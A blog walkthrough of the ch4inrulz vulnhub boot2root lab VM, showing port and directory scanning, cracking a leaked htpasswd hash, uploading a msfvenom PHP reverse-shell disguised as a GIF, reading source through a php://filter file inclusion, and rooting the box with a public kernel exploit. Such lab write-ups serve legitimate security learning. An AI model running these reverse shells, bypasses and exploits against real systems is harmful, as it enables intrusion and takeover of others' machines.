Tovi Jaeschke

Links:

Recent posts:

ch4inrulz 1.0.1 boot2root walkthrough

Walkthrough for ch4inrulz from vulnhub.com.

Scanning & Recon

I start off with a netdiscover scan, to find the ip address of the target.


netdiscover -r 10.1.1.1/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 564
_____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.246      08:00:27:60:ca:e7      2      84  PCS Systemtechnik GmbH

I find out the ip is 10.1.1.246, and perform a nmap scan.

nmap -p- -sV -oN nmap_ch4inrulz.txt 10.1.1.246
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-22 11:43 ACDT
Nmap scan report for 10.1.1.246
Host is up (0.00028s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:60:CA:E7 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds

I do a quick searchsploit search for all the open services on the machine, but find nothing. I then open up the website, and have a quick read of the content and the source code, again, i dont find anything. I then do a nikto scan on the main website, and dirb scan on both the main website and the development site.

dirb http://10.1.1.246 -o ch4inrulz_dirb.txt
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: ch4inrulz_dirb.txt
START_TIME: Mon Oct 22 11:55:00 2018
URL_BASE: http://10.1.1.246/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.1.1.246/ ----
+ http://10.1.1.246/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: http://10.1.1.246/css/
+ http://10.1.1.246/development (CODE:401|SIZE:477)
==> DIRECTORY: http://10.1.1.246/img/
+ http://10.1.1.246/index (CODE:200|SIZE:334)
+ http://10.1.1.246/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://10.1.1.246/js/
+ http://10.1.1.246/LICENSE (CODE:200|SIZE:1093)
+ http://10.1.1.246/robots (CODE:200|SIZE:21)
+ http://10.1.1.246/robots.txt (CODE:200|SIZE:21)
+ http://10.1.1.246/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.1.1.246/vendor/

---- Entering directory: http://10.1.1.246/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Oct 22 11:55:02 2018
DOWNLOADED: 4612 - FOUND: 8
nikto -h http://10.1.1.246
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.246
+ Target Hostname:    10.1.1.246
+ Target Port:        80
+ Start Time:         2018-10-22 11:57:50 (GMT10.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 23:09:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8479 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2018-10-22 11:58:05 (GMT10.5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


dirb http://10.1.1.246:8011

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 22 12:48:49 2018
URL_BASE: http://10.1.1.246:8011/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.1.1.246:8011/ ----
==> DIRECTORY: http://10.1.1.246:8011/api/
+ http://10.1.1.246:8011/index.html (CODE:200|SIZE:30)
+ http://10.1.1.246:8011/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.1.1.246:8011/api/ ----
+ http://10.1.1.246:8011/api/index.html (CODE:200|SIZE:351)

-----------------
END_TIME: Mon Oct 22 12:48:52 2018
DOWNLOADED: 9224 - FOUND: 3

The first few thing that sticks out to me is the Apache mod_negotiation line in the nikto scan, which alerts me to alternate index pages, and the api uri with a return code of 200. I insert /index.html.bak into the uri, which prompts me to download the file.

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

I check the hash with hash identifier, which tells me the hash is a MD5(APR) type hash, which I then crack with john the ripper.

cat "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0" >> hashes.txt
john hashes.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"
Use the "--format=md5crypt-opencl" option to force loading these as that type instead
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 12x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2018-10-22 12:23) 33.33g/s 6300p/s 6300c/s 6300C/s Frank[..Fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Which tells me the password is frank!!!. I open the /development/ uri in my browser, enter the password, and have a look around.

Getting a shell

I create a reverse tcp meterpreter shell, and attempt to upload it to the target


msfvenom -p php/meterpreter/reverse_tcp LHOST="10.1.1.212" LPORT="4444" >> shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1111 bytes

But get this message. File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded. So I change the file extension to .gif, insert the line GIF98 at the start of the file, and try again, which works. Now, i have no idea where the file is uploaded to, so I return to my earlier dirb scan of the development website, and start poking around the /api/ uri. I start with the files_api.php file. After adding the file parameter to the uri, I get this message, which leaves me stumped for a little while. I decide to try to use a POST request instead.

curl -X POST -d "file=/var/www/development/uploader/upload.php" http://10.1.1.246:8011/api/files_api.php

<head>
  <title>franks website | simple website browser API</title>
</head>

Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

Which didnt work, so I tried with a php filter.

curl -X POST -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" http://10.1.1.246:8011/api/files_api.php

<head>
  <title>franks website | simple website browser API</title>
</head>

PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=

I decode the base64 string, which gives me

 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

After finding that the file is uploaded to FRANKuploads/, I start a meterpreter multi/handler and use the same tecnique to get the file, which opens a meterpreter shell.

[*] Started reverse TCP handler on 10.1.1.212:4444
[*] Sending stage (37775 bytes) to 10.1.1.246
[*] Meterpreter session 1 opened (10.1.1.212:4444 -> 10.1.1.246:54405) at 2018-10-22 13:28:33 +1030

meterpreter > ls
Listing: /var/anotherwww/api
============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  656   fil   2018-04-14 21:36:15 +0930  files_api.php
100644/rw-r--r--  351   fil   2018-04-14 21:35:46 +0930  index.html

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 992 created.
Channel 0 created.
whoami
www-data
cd /home
ls
frank
cd frank
ls
PE.txt
user.txt
cat user.txt
4795aa2a9be22fac10e1c25794e75c1b
exit
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64
Meterpreter : php/linux
meterpreter >

Getting Root

I use searchsploit to look for an exploit for the linux kernel, as its serverly out of date, and find this exploit.


searchsploit linux 2.6 Privilege Escalation
...
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                                                  | exploits/linux/local/15285.c
...


meterpreter > upload /opt/exploit-database/exploits/linux/local/15285.c /tmp/exploit.c
[*] uploading  : /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
[*] Uploaded -1.00 B of 6.99 KiB (-0.01%): /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
[*] uploaded   : /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
meterpreter > shell
Process 1015 created.
Channel 1 created.
gcc exploit.c
ls
a.out
exploit.c
./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
ls
a.out
exploit.c
whoami
root
ls /root
root.txt
cat /root/root.txt
8f420533b79076cc99e9f95a1a4e5568

Conclusion

This was a fun box, not too difficult. Keep your kernels up to date!!